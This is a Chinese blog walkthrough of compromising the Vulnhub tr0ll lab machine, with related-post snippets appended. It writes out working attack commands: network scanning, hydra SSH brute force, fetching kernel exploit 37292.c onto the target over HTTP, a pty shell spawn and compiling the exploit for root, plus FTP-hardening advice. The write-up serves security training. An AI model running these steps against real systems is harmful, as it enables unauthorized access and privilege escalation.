渗透Vulnhub-tr0ll靶机

最新推荐文章于 2025-01-17 17:35:45 发布
原创 最新推荐文章于 2025-01-17 17:35:45 发布 · 648 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #数据库 #安全 #apache #linux

本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列tr0ll靶机有定的了解

一、信息收集阶段

靶机官网:https://www.vulnhub.com/entry/tr0ll-3,340/

因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.60.0/24

1、扫描网段,发现主机

nmap -sP 192.168.60.0/24

2、扫描主机详细信息

nmap -sT -sV -sC  192.168.60.171
#-sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
#-sV 尝试确定每个打开端口上运行的服务的版本
#-sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等

二、攻击面寻找阶段

1、web页面枚举

dirb http://192.168.60.171

2、ftp匿名登陆

刚才在信息收集阶段通过nmap得知21端口存在ftp匿名登录,这里我们尝试登录

ftp 192.168.60.171
#账号:ftp
#密码:空

3、ftp下载pcap流量包文件

get lol.pcap  #ftp下载lol.pcap文件

4、wireshark打开pcap文件过滤数据包


流量分析:

5、下载sup3rs3cr3tdirlol的二进制文件

wget http://192.168.60.171/sup3rs3cr3tdirlol/roflmao


执行一下看看

chmod 777 roflmao
./roflmao

6、海德拉爆破

wget 192.168.60.171/0x0856BF/this_folder_contains_the_password/Pass.txt  #下载账号文本
wget 192.168.60.171/0x0856BF/good_luck/which_one_lol.txt 		#下载密码文本


hydra -L which_one_lol.txt -p Pass.txt 192.168.60.171 ssh -v #指定文件爆破目标ssh

7、ssh登录

ssh overflow@192.168.60.171   #使用overflow登录目标机
uname -a
lsb_release

三、攻击提权阶段

1、查看内核版本历史漏洞

#我们通过uname -a  lsb_release查看到系统内核
searchsploit Ubuntu 14.04|grep 3.13.0

2、下载exp文件

searchsploit  -m 37292.c

3、kali开启http微服务

python -m http.server 8088

4、ssh靶机下载exp文件

ls -la #查看哪个目录可以写入执行
cd /tmp
wget http://192.168.60.128:8088/37292.c

5、python创建终端

python -c "import pty;pty.spawn('/bin/bash')"

6、编译利用exp文件

gcc -o exp 37292.c   #编译利用文件 保存为exp
chmod +x exp		#exp文件添加执行权限
./exp			#执行提权

四、ftp匿名登录防范措施

1、vsftpd

#打开vsftpd的配置文件,通常位于 /etc/vsftpd/vsftpd.conf 或 /etc/vsftpd.conf。
anonymous_enable=NO   #找到配置文件把值改成NO
sudo systemctl restart vsftpd   #重启vsftpd服务

2、ProFTPD

#打开ProFTPD的配置文件,通常位于 /etc/proftpd/proftpd.conf 或 /etc/proftpd.conf
<Anonymous ~ftp>    #整行注释掉
sudo systemctl restart proftpd		#重启proftpd服务

声明! 学习内容来自B站up主 泷羽sec的OSCP考证培训课程有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!

渗透测试靶机---Tr0ll
久恙502的博客
10-28 566
渗透测试,打靶经历记录,大佬多多指点,谢谢!
Tr0ll靶机练习
SYJ_361的博客
03-27 3030
本文是对Tr0ll靶机的练习,利用ftp漏洞进行远程登录,利用python生成反弹shell的脚本,并通过远程进行下载,并对靶机进行提权,最终获得root权限
VulnHubTr0ll靶机训练
ccssggoo的博客
03-09 3183
靶机下载地址:https://download.vulnhub.com/tr0ll/Tr0ll.rar​​​​​​ 渗透机kali2022 靶机:Tr0ll 安装好靶机后用netdiscover -r 192.168.10.0/24发现ip,在用nmap工具扫描发现的ip找到搭建好的靶机ip
Vulnhub靶机系列:Tr0ll: 1
汗的博客
03-31 1666
这次的靶机Vulnhub靶机Tr0ll: 1 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/tr0ll-1%2C100/ 文件大小: 434 MB MD5: 318FE0B1C0DD4FA0A8DCA43EDACE8B20 SHA1: 9C459ED10166ACAB9B7D8...
VulnHub-Tr0ll1靶机学习笔记与文档整理
Tr0ll1是VulnHub上的一个靶机,它的设计目的是让使用者通过渗透测试来发现和利用漏洞,最终获取系统权限。 靶机学习笔记通常包括了攻击者在进行渗透测试时的思路和步骤记录,可以帮助新手理解渗透测试的流程,并...
Vulnhub Tr0ll2靶机实战
kiritio1024513的博客
01-16 999
一次有用的靶机实战
vulnhub Tr0ll靶机实战
kiritio1024513的博客
01-13 728
一次有趣的靶机实战
Vulnhub Tr0ll3靶机实战
kiritio1024513的博客
01-16 940
你懂近源渗透嘛,elf是什么格式的文件呢?这个靶机真的很有用!!!
Vulnhub通关】Tr0ll: 1
icewolf00的博客
02-28 1389
Tr0ll: 1LinuxNAT渗透测试目标:获取靶机root权限并读取Flag文件。
Tr0ll1靶机训练
m0_62709637的博客
02-21 426
Tr011打靶训练
【学渗透靶机——Tr0ll
jieli0901227的博客
06-04 281
编辑脚本,执行系统命令让overflow 用户以root身份执行所有权限,脚本执行后再次登录overflow 用户就能以root身份执行bash。下载查看roflmao 文件,0x0856BF这个地址有可能是内存地址,也有可能是url 路径地址。Pass.txt文件里面的密码我们已经试过了,既然文件夹中包含面,但是这个文件名还没试过。发现了两个文件,打开第二个文件查看,发现了Pass.txt文件,查看看看。操作过程会中断,,是不是有计划任务存在执行脚本呢,查看计划任务无权限,匿名用户登录,发现有文件。
【oscp系列-Tr0ll-1】靶机4
weixin_44807430的博客
01-16 689
知行合一
靶机渗透测试(Tr0ll: 1)
@小张小张的博客
12-14 1278
靶机渗透测试(Tr0ll: 1): Vulnhub靶机 Tr0ll: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Beginner)) 描述:The goal is simple, gain root and get Proof.txt from the /root directory 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192
tr0ll靶机渗透
weixin_43070384的博客
06-19 871
. 发现目标靶机IP地址,然后可以得出目标网站的IP地址,所以通过IP地址登陆网站。 nmap -sP 192.168.xxx.0/24 2. 得到目标靶机的ip地址后,用浏览器登陆目标IP,发现是一张图片! 3. 然后我们遍历目录,查找敏感路径。 4. 通过遇见扫描出地址登陆 robots.txt 5.登陆192.168.111.131/secret/index.html(本能应激登陆) 6.扫服务发现开启了ftp服务 7.已知ftp服务打开了,所以干他娘的,二营长把我的意大利炮抬出来...
VulnHub-Tr0ll-靶机渗透学习
嗯嗯呐的博客
11-15 1967
**靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 靶机难度:简单(CTF) 靶机描述:Tr0ll的灵感来自OSCP实验室中不断摇曳的机器 目标:得到root权限目录一、信息收集二、流量分析三、口令爆破四、内核漏洞提权五、总结 一、信息收集 Nmap 扫描确定靶机的IP地址 扫描存活端口 访问80端口,没有获得有用的信息 使用dirb爆破一下目录 dirb http://192.168.16.136/ 分别访问试试看,没有获得有用的信息 在上面端口
Vulnhub-Tr0ll靶机笔记
最新发布
LINGX5的博客
01-17 498
靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 这台靶机比较简单,包含ftp的渗透,pcap流量包的分析,常规的web渗透和系统内核提权。让我们开始吧Hackit!
一次零基础靶机渗透细节全程记录——Tr0ll
ranzi.
07-12 4470
渗透测试:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法渗透测。1.确定目标:在本靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,只是针对此靶场而言。其他实战中确定目标的方式包括nmap进行扫描,但不局限于这个nmap。2.信息收集:比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这个靶场中比如信息收集包括查看源码,使用工具dirb等。3.发现漏洞:那些理论比如sql注入,文件上传等,或者找
Tr0ll渗透打靶测试
Tummyiii的博客
12-23 1074
简单的渗透打靶测试
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值